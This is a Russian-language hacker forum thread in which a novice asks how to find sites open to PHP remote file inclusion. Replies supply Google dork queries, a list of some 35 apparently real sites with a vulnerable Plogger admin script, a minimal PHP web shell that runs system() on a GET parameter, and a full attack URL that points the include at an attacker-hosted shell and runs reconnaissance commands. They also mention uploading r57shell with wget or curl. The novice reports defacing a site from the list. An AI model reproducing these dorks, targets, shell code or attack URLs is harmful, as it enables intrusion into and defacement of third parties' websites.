Php инклудинг

Привет!Может ктонибуть подсказать как искать сайты с пхп инжекцией!Я вчера полинета перерыл но нашел только один!!Подскжите как их искать или скажите несколько сайтов у которых есть эта уезвимость!ПЛИИЗ!

 

Есть такое понятие поисковик! =)

Есть такое понятие поисковик! =)

Юзай www.Google.ru

Можно искать запросами:
inurl:"page.php?page=" filetypehp
inurl:"index.php?page=" filetypehp
inurl:"page.php?page=" site:.ru
inurl:"page.php?p=" site:.ru
inurl:"index.php?page=" site:.com

Ну там много разных вариаций.

 

половина из них сдохла, но может найдешь действующие

на удаленом хосте должен быть файл plog-functions.php

HTML:

http://www.magnapop.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.mindcyber.com/wallpaper/admin/plog-admin-functions.php?config[basedir]=
http://www.kasnews.de/kunst/admin/plog-admin-functions.php?config[basedir]=
http://www.distortion2static.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ncfiremuseum.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://kelly.greneaux.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://216.22.25.215/~neeners/classic/gallery/admin/plog-admin-functions.php?config[basedir]=
http://musicbc.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.samson-mfg.com/gallery2/admin/plog-admin-functions.php?config[basedir]=
http://www.z90.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.dogtopia.biz/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.wilcofoppen.com/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aabany.org/blog/galeria/admin/plog-admin-functions.php?config[basedir]=
http://www.newdesire.org/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.boricuapower.net/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.aurorapemper.com/pictures/admin/plog-admin-functions.php?config[basedir]=
http://91x.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.helpanimalsinc.org/pictures/admin/plog-admin-functions.php?config[basedir]=
http://www.trieste.si/miramare/plogger/admin/plog-admin-functions.php?config[basedir]=
http://dougal.gunters.org/test/plog/admin/plog-admin-functions.php?config[basedir]=
http://photos.pivwan.net/admin/plog-admin-functions.php?config[basedir]=
http://letatou.info/galerie/admin/plog-admin-functions.php?config[basedir]=
http://theg3nius.com/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.diazvillanueva.com/fotografia/admin/plog-admin-functions.php?config[basedir]=
http://www.hunder.ca/plogger/admin/plog-admin-functions.php?config[basedir]=
http://www.coyforce.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://www.ourense.com/galerias/admin/plog-admin-functions.php?config[basedir]=
http://www.fjellbruk.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.karlshusgarasjene.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://www.uitvaartbeurs.info/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
http://caraga.dost.gov.ph/photoblog/admin/plog-admin-functions.php?config[basedir]=
http://www.rudylacy.com/photos/admin/plog-admin-functions.php?config[basedir]=
http://www.thefinalfantasy.com/picturepost/admin/plog-admin-functions.php?config[basedir]=
http://www.azadadventures.com/gallery/admin/plog-admin-functions.php?config[basedir]=
http://galleria.aainaa.com/admin/plog-admin-functions.php?config[basedir]=

 

Ну чёт я не понял!!Я нашел сайт с инжекцией!!!Нашел файл залил его к себе на сайт а мне пишут
Fatal error: Cannot redeclare add_comment() (previously declared in /home/musicbco/public_html/ploggerb2/admin/plog-admin-functions.php:537) in http://site.narod.ru/plog-functions.php on line 377

 

учи матчасть =)
http://php.rinet.ru/manual/ru/function.include.php

 

plog-functions.php должен быть шелл, либо от rst либо самописный, типа

PHP:

<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>

Плагиат Ж)

Вот пример конечной ссылки:
admin/plog-admin-functions.php?config[basedir]=http://Пурум-пум-пум.narod.ru&cmd=id;pwd;uname+-a;ls+-la

причем http://Пурум-пум-пум.narod.ru/plog-functions.php это шелл-код

 

max_pain89!я нашел из списка сайт!Дефейснул его как ты сказал!!!!На пиши плиииззз описание этой уязвимости и как её искать

 

Кстати я залил в файл plog-functions.php шелл r57shell.php!начал дефейсить!Но выходит сообщение
Parse error: parse error, unexpected $, expecting ')' in http://framhack.narod.ru/plog-functions.php on line 787
что это и как можно исправить

 

анти4ат против дефэйсов

 

ОК!Небуду дефейсить!Ну расскажи!ПЛИЗ!

 

это связано с тем, что не успевает скачаться код, лучше сначало закачай шелл в доступную папку ( по дефолту ../uploads)

 

хм!А какими командами или как их туда залить

 

Кстати!А где можно скачать статьи по инклуду,подробное описани атаки и самой уезвимости

 

Качалок много, популярные wget, fetch, curl. Синтакс где-нито сам найди. А на счет статей не знаю.

 

http://forum.antichat.ru/thread12123.html

 

Или тут почитай! http://store-room.h15.ru

 

учи матчасть =)
http://php.rinet.ru/manual/ru/function.include.php
=))) еще пару раз и я устану =)))

 

ОК!)

 

А что означает сообщение
Warning: main(inc/plantillas/): failed to open stream: No such file or directory in /home/guiamani/public_html/page.php on line 17

Warning: main(inc/plantillas/): failed to open stream: No such file or directory in /home/guiamani/public_html/page.php on line 17

Warning: main(): Failed opening 'inc/plantillas/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/guiamani/public_html/page.php on line 17

 

fram, ты прикалываешься? Надеюсь что да =)))
Это значит что файла или директории не существует по указанному пути